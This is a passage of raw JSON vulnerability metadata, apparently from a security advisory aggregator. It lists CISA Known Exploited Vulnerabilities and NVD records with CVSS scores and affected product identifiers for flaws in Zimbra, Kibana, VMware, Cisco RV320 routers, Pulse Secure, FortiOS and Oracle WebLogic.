Restriction of XML External Entity Reference vulnerability affecting Synacor Zimbra Collaboration Suite.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-10T00:00:00", "type": "cisa_kev", "title": "Synacor Zimbra Collaboration Suite Improper Restriction of XML External Entity Reference", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-9670"], "modified": "2022-01-10T00:00:00", "id": "CISA-KEV-CVE-2019-9670", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Kibana contain an arbitrary code execution flaw in the Timelion visualizer.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-10T00:00:00", "type": "cisa_kev", "title": "Kibana Arbitrary Code Execution", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-7609"], "modified": "2022-01-10T00:00:00", "id": "CISA-KEV-CVE-2019-7609", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T17:26:47", "description": "VMware Workspace One Access, Access Connector, Identity Manager, and Identity Manager Connector address have a command injection vulnerability.", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "VMware Workspace One Access, Access Connector, Identity Manager, and Identity Manager Connector Command Injection vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-4006"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2020-4006", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T17:26:47", "description": "A vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an unauthenticated, remote attacker to retrieve sensitive information. The vulnerability is due to improper access controls for URLs. An attacker could exploit this vulnerability by connecting to an affected device via HTTP or HTTPS and requesting specific URLs. A successful exploit could allow the attacker to download the router configuration or detailed diagnostic information.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Cisco RV320 and RV325 Routers Improper Access Control Vulnerability (COVID-19-CTI list)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1653"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2019-1653", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-10T17:26:47", "description": "An unauthenticated remote attacker can send a specially crafted URI to perform an arbitrary file reading vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Pulse Connect Secure VPN arbitrary file reading vulnerability (COVID-19-CTI list)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2019-11510", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T17:26:47", "description": "The vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "VMware vCenter Server Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-21972", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T17:26:47", "description": "An Improper Limitation of a Pathname to a Restricted Directory (\"Path Traversal\") in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Fortinet FortiOS SSL VPN credential exposure vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2018-13379", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Oracle WebLogic Server Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2020-14882", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-24T01:05:20", "description": "mailboxd component in Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10 has an XML External Entity injection (XXE) vulnerability, as demonstrated by Autodiscover/Autodiscover.xml.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-05-29T22:29:00", "type": "cve", "title": "CVE-2019-9670", "cwe": ["CWE-611"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-9670"], "modified": "2021-06-26T13:15:00", "cpe": ["cpe:/a:synacor:zimbra_collaboration_suite:8.7.11"], "id": "CVE-2019-9670", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-9670", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:synacor:zimbra_collaboration_suite:8.7.11:-:*:*:*:*:*:*", "cpe:2.3:a:synacor:zimbra_collaboration_suite:8.7.11:p1:*:*:*:*:*:*", "cpe:2.3:a:synacor:zimbra_collaboration_suite:8.7.11:p4:*:*:*:*:*:*", "cpe:2.3:a:synacor:zimbra_collaboration_suite:8.7.11:p8:*:*:*:*:*:*", "cpe:2.3:a:synacor:zimbra_collaboration_suite:8.7.11:p7:*:*:*:*:*:*", "cpe:2.3:a:synacor:zimbra_collaboration_suite:8.7.11:p2:*:*:*:*:*:*", "cpe:2.3:a:synacor:zimbra_collaboration_suite:8.7.11:p5:*:*:*:*:*:*", "cpe:2.3:a:synacor:zimbra_collaboration_suite:8.7.11:p3:*:*:*:*:*:*", "cpe:2.3:a:synacor:zimbra_collaboration_suite:8.7.11:p6:*:*:*:*:*:*", "cpe:2.3:a:synacor:zimbra_collaboration_suite:8.7.11:p9:*:*:*:*:*:*"]}, {"lastseen": "2022-03-24T00:30:35", "description": "Kibana versions before 5.6.15 and 6.6.1 contain an arbitrary code execution flaw in the Timelion visualizer. An attacker with access to the Timelion application could send a request that will attempt to execute javascript code. This could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2019-03-25T19:29:00", "type": "cve", "title": "CVE-2019-7609", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-7609"], "modified": "2020-10-19T18:09:00", "cpe": ["cpe:/a:redhat:openshift_container_platform:4.1", "cpe:/a:redhat:openshift_container_platform:3.11"], "id": "CVE-2019-7609", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-7609", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:redhat:openshift_container_platform:4.1:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:openshift_container_platform:3.11:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T18:23:03", "description": "VMware Workspace One Access, Access Connector, Identity Manager, and Identity Manager Connector address have a command injection vulnerability.", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-11-23T22:15:00", "type": "cve", "title": "CVE-2020-4006", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-4006"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/a:vmware:identity_manager:3.3.1", "cpe:/a:vmware:cloud_foundation:4.0.1", "cpe:/a:vmware:identity_manager:3.3.3", "cpe:/a:vmware:identity_manager_connector:3.3.2", "cpe:/a:vmware:identity_manager_connector:3.3.1", "cpe:/a:vmware:identity_manager:3.3.2", "cpe:/a:vmware:cloud_foundation:4.0", "cpe:/a:vmware:identity_manager_connector:3.3.3", "cpe:/a:vmware:one_access:20.10", "cpe:/a:vmware:vrealize_suite_lifecycle_manager:8.2", "cpe:/a:vmware:one_access:20.01"], "id": "CVE-2020-4006", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-4006", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:vmware:identity_manager:3.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager_connector:3.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager_connector:3.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager:3.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:one_access:20.10:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:one_access:20.01:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager:3.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager_connector:3.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_suite_lifecycle_manager:8.2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T21:14:58", "description": "A vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an unauthenticated, remote attacker to retrieve sensitive information. The vulnerability is due to improper access controls for URLs. An attacker could exploit this vulnerability by connecting to an affected device via HTTP or HTTPS and requesting specific URLs. A successful exploit could allow the attacker to download the router configuration or detailed diagnostic information. Cisco has released firmware updates that address this vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-01-24T16:29:00", "type": "cve", "title": "CVE-2019-1653", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1653"], "modified": "2020-10-05T19:37:00", "cpe": ["cpe:/o:cisco:rv320_firmware:1.4.2.15", "cpe:/o:cisco:rv325_firmware:1.4.2.17", "cpe:/o:cisco:rv320_firmware:1.4.2.17", "cpe:/o:cisco:rv325_firmware:1.4.2.15"], "id": "CVE-2019-1653", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-1653", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:cisco:rv325_firmware:1.4.2.15:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv325_firmware:1.4.2.17:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv320_firmware:1.4.2.17:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv320_firmware:1.4.2.15:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T19:14:21", "description": "In Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4, an unauthenticated remote attacker can send a specially crafted URI to perform an arbitrary file reading vulnerability .", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2019-05-08T17:29:00", "type": "cve", "title": "CVE-2019-11510", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2020-08-24T17:37:00", "cpe": ["cpe:/a:pulsesecure:pulse_connect_secure:8.3", "cpe:/a:pulsesecure:pulse_connect_secure:9.0", "cpe:/a:pulsesecure:pulse_connect_secure:8.2"], "id": "CVE-2019-11510", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-11510", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:pulsesecure:pulse_connect_secure:8.3:r3:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:8.3:r5.1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:8.3:r5.2:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:8.2:r8.2:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:8.2:r12.0:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:8.3:r4:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:8.2:r1.0:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:8.2:r5.1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:8.3:r6:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r3:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:8.3:r7:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:8.3:r2.1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:8.3:r2:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:8.3:r6.1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:8.2:r10.0:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:8.2:r8.1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:8.3:r1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:8.2:r2.0:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:8.2:r4.0:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:8.2:r11.0:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r3.1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r3.3:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:8.2:r7.1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r2:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:8.2:r6.0:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:8.2:r1.1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r2.1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:8.3:r5:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:8.2:r7.0:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r3.2:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:8.2:r3.1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:8.2:r5.0:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:8.2:r8.0:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:8.2:r4.1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:8.2:r3.0:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:8.2:r9.0:*:*:*:*:*:*"]}, {"lastseen": "2022-07-13T15:59:49", "description": "The vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-24T17:15:00", "type": "cve", "title": "CVE-2021-21972", "cwe": ["CWE-306", "CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": 